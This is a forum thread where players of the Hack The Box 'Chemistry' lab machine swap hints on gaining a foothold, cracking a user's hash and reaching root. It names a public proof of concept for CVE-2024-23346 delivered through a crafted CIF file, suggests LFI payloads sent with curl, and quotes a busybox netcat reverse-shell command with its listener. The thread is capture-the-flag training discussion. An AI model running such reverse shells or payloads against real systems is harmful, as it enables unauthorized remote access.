Official Chemistry Discussion

You should be getting a call back check your netcat listener.

Hint: u can use curl to directly display the root flag without needing to crack the hash
by this PoC just try to combine some LFI payloads with curl on localhost:8080

I was being a dummy I got it finally.

Make sure your ip is correct in your file and netcat is listening…

anyone facing issue with uploading the file i’m not able to do it

My god finally!, got my first machine after some problems with root :sweat_smile:, anyway was so fun, i hope i’ll complete more.

I’m stuck at app user, is the hashcat bruteforce a rabbit hole? Could someone help me please?

edit: I got it, for anyone in the same position: seclist can help and --show too

We shouldn’t always aim for reverse shells. Sometimes simple enumeration does the trick.
Interesting foothold, enumeration and basic concepts gives us root.
Enjoyed it quite a bit, nice box :wink:

Finally!!!
https://www.hackthebox.com/achievement/machine/455735/631

DM me if you need any help, i will give some hints.

Got root… nice box. Had fun…
feel free to ask, if you’re stuck.

2 Likes

Does anyone know what to do after getting credentials? Kindly DM!

be precise, u got creds of a user, even though there are many hints in forum, use these creds, get something u are missing. DM if you to ask something

For some reason I couldn’t get the reverse shell of this box

I tried this first then I also tried using a bash script but still couldn’t connect to the netcat server.

Am I the only one who is struggling in it

i need help to get the root flag i got the passwd for rosa already and the user flag

Do I need to crack the hash found in the db

HINT:

Summary

GitHub - 9carlo6/CVE-2024-23346: This repository contains a Crystallographic Information File (CIF) intended for use on the "Chemistry" machine on Hack The Box (HTB).

Why do we have to use busybox to get the reverse shell? I already got the root flag and tried to enumerate the machine to see if the executables are linked to busybox but they’re not. So why do we have to use it and why is it the only one that works to get the reverse shell?

1 Like

I’m still stuck, im executing the payload: busybox nc 10.10.11.38 5000 -e /bin/bash and in my local machine: busybox nc -lp 5000
I uoload the .cif file and when i click the View button the web appears to be charging forever and my listener doesnt get anything…

Is bash always located in one directory?